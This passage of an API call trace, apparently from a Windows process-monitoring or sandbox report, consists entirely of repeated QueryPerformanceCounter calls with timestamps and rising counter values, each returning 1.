lpPerformanceCount=0x6adfdfc*=3095790724421) returned 1 [0139.088] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095790750398) returned 1 [0139.104] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095792321027) returned 1 [0139.104] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095792350425) returned 1 [0139.120] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095793911214) returned 1 [0139.120] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095793934691) returned 1 [0139.136] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095795488942) returned 1 [0139.136] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095795506617) returned 1 [0139.152] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095797088287) returned 1 [0139.152] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095797108950) returned 1 [0139.175] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095799431169) returned 1 [0139.175] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095799450636) returned 1 [0139.224] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095804307210) returned 1 [0139.224] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095804343647) returned 1 [0139.238] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095805737075) returned 1 [0139.239] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095805759907) returned 1 [0139.256] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095807495118) returned 1 [0139.256] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095807517576) returned 1 [0139.272] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095809143292) returned 1 [0139.273] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095809169197) returned 1 [0139.288] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095810740728) returned 1 [0139.289] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095810768365) returned 1 [0139.304] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095812340499) returned 1 [0139.305] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095812378125) returned 1 [0139.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095814093415) returned 1 [0139.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095814111666) returned 1 [0139.337] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095815630839) returned 1 [0139.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095815655762) returned 1 [0139.353] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095817236214) returned 1 [0139.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095817273441) returned 1 [0139.370] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095818911444) returned 1 [0139.370] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095818950542) returned 1 [0139.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095820506586) returned 1 [0139.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095820549164) returned 1 [0139.402] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095822085116) returned 1 [0139.402] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095822119661) returned 1 [0139.418] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095823668596) returned 1 [0139.418] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095823682927) returned 1 [0139.434] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095825270038) returned 1 [0139.434] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095825288526) returned 1 [0139.450] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095826867221) returned 1 [0139.450] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095826880594) returned 1 [0139.466] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095828476516) returned 1 [0139.466] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095828501985) returned 1 [0139.482] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095830075570) returned 1 [0139.482] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095830093850) returned 1 [0139.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095832013647) returned 1 [0139.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095832041016) returned 1 [0139.513] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095833250533) returned 1 [0139.514] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095833268331) returned 1 [0139.529] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095834851862) returned 1 [0139.530] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095834871233) returned 1 [0139.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095836469497) returned 1 [0139.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095836495335) returned 1 [0139.562] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095838061734) returned 1 [0139.562] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095838088230) returned 1 [0139.579] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095839761059) returned 1 [0139.579] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095839797933) returned 1 [0139.594] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095841352942) returned 1 [0139.595] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095841379342) returned 1 [0139.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095842952347) returned 1 [0139.611] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095842970122) returned 1 [0139.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095844551764) returned 1 [0139.627] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095844591275) returned 1 [0139.642] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095846153544) returned 1 [0139.643] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095846168434) returned 1 [0139.658] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095847750222) returned 1 [0139.659] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095847768162) returned 1 [0139.674] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095849351578) returned 1 [0139.675] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095849369818) returned 1 [0139.690] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095850950022) returned 1 [0139.691] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095850966182) returned 1 [0139.706] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095852551783) returned 1 [0139.707] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095852570409) returned 1 [0139.722] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095854151877) returned 1 [0139.723] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095854170485) returned 1 [0139.738] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095855744133) returned 1 [0139.739] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095855759531) returned 1 [0139.754] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095857350493) returned 1 [0139.755] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095857374183) returned 1 [0139.770] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095858950936) returned 1 [0139.771] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095858967112) returned 1 [0139.786] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095860547179) returned 1 [0139.787] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095860563775) returned 1 [0139.802] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095862147342) returned 1 [0139.803] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095862161627) returned 1 [0139.818] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095863743702) returned 1 [0139.819] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095863757543) returned 1 [0139.834] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095865344245) returned 1 [0139.835] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095865357709) returned 1 [0139.850] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095866945430) returned 1 [0139.851] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095866961457) returned 1 [0139.867] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095868557991) returned 1 [0139.867] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095868579573) returned 1 [0139.883] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095870163509) returned 1 [0139.883] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095870191875) returned 1 [0139.899] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095871761800) returned 1 [0139.899] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095871791053) returned 1 [0139.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095873505972) returned 1 [0139.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095873547443) returned 1 [0139.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095875097649) returned 1 [0139.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095875114844) returned 1 [0139.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095876704043) returned 1 [0139.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095876742808) returned 1 [0139.993] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095881238425) returned 1 [0139.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095881256578) returned 1 [0139.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095881351661) returned 1 [0139.995] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095881368165) returned 1 [0139.995] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095881449254) returned 1 [0139.996] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095881464760) returned 1 [0140.011] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095883052820) returned 1 [0140.012] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095883075093) returned 1 [0140.027] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095884653627) returned 1 [0140.028] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095884670626) returned 1 [0140.043] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095886249916) returned 1 [0140.044] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095886266534) returned 1 [0140.059] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095887852401) returned 1 [0140.060] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095887870996) returned 1 [0140.075] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095889442730) returned 1 [0140.076] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095889458935) returned 1 [0140.091] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095891024047) returned 1 [0140.091] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095891040659) returned 1 [0140.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095892672743) returned 1 [0140.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095892690760) returned 1 [0140.123] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095894226934) returned 1 [0140.123] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095894250406) returned 1 [0140.139] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095895828598) returned 1 [0140.139] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095895850895) returned 1 [0140.155] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095897426781) returned 1 [0140.155] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095897449039) returned 1 [0140.171] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095899023123) returned 1 [0140.171] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095899040231) returned 1 [0140.187] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095900626852) returned 1 [0140.187] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095900645366) returned 1 [0140.203] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095902224252) returned 1 [0140.203] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095902241812) returned 1 [0140.219] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095903818710) returned 1 [0140.219] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095903836152) returned 1 [0140.235] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095905442793) returned 1 [0140.236] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095905501446) returned 1 [0140.251] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095907025118) returned 1 [0140.251] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095907040764) returned 1 [0140.267] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095908619183) returned 1 [0140.267] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095908633206) returned 1 [0140.284] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095910284011) returned 1 [0140.284] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095910316640) returned 1 [0140.302] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095912060018) returned 1 [0140.302] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095912077991) returned 1 [0140.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095914087597) returned 1 [0140.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095914115911) returned 1 [0140.337] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095915571754) returned 1 [0140.337] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095915590763) returned 1 [0140.352] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095917147166) returned 1 [0140.353] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095917169225) returned 1 [0140.368] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095918742185) returned 1 [0140.369] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095918761715) returned 1 [0140.384] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095920343797) returned 1 [0140.385] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095920374024) returned 1 [0140.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095921943871) returned 1 [0140.401] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095921961873) returned 1 [0140.416] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095923550132) returned 1 [0140.417] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095923573333) returned 1 [0140.432] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095925146343) returned 1 [0140.433] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095925174268) returned 1 [0140.448] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095926725423) returned 1 [0140.448] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095926742444) returned 1 [0140.464] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095928322750) returned 1 [0140.464] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095928339140) returned 1 [0140.486] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095930509513) returned 1 [0140.486] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095930527616) returned 1 [0140.503] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095932247232) returned 1 [0140.504] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095932272644) returned 1 [0140.519] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095933841312) returned 1 [0140.520] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095933867110) returned 1 [0140.542] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095936149490) returned 1 [0140.543] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095936189141) returned 1 [0140.557] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095937644180) returned 1 [0140.558] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095937662701) returned 1 [0140.567] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095938631020) returned 1 [0140.567] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095938646348) returned 1 [0140.584] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095940295574) returned 1 [0140.584] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095940323151) returned 1 [0140.599] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095941830286) returned 1 [0140.599] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095941847448) returned 1 [0140.615] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095943433920) returned 1 [0140.615] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095943456688) returned 1 [0140.639] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095945848803) returned 1 [0140.640] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095945872222) returned 1 [0140.648] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095946694243) returned 1 [0140.648] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095946717730) returned 1 [0140.664] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095948280495) returned 1 [0140.664] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095948303503) returned 1 [0140.680] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095949875624) returned 1 [0140.680] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095949891413) returned 1 [0140.696] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095951481035) returned 1 [0140.696] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095951500956) returned 1 [0140.712] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095953075875) returned 1 [0140.712] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095953091541) returned 1 [0140.728] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095954679591) returned 1 [0140.728] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095954697709) returned 1 [0140.744] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095956279201) returned 1 [0140.744] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095956302080) returned 1 [0140.760] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095957879622) returned 1 [0140.760] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095957925792) returned 1 [0140.776] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095959481213) returned 1 [0140.776] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095959524141) returned 1 [0140.792] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095961142613) returned 1 [0140.793] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095961169291) returned 1 [0140.808] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 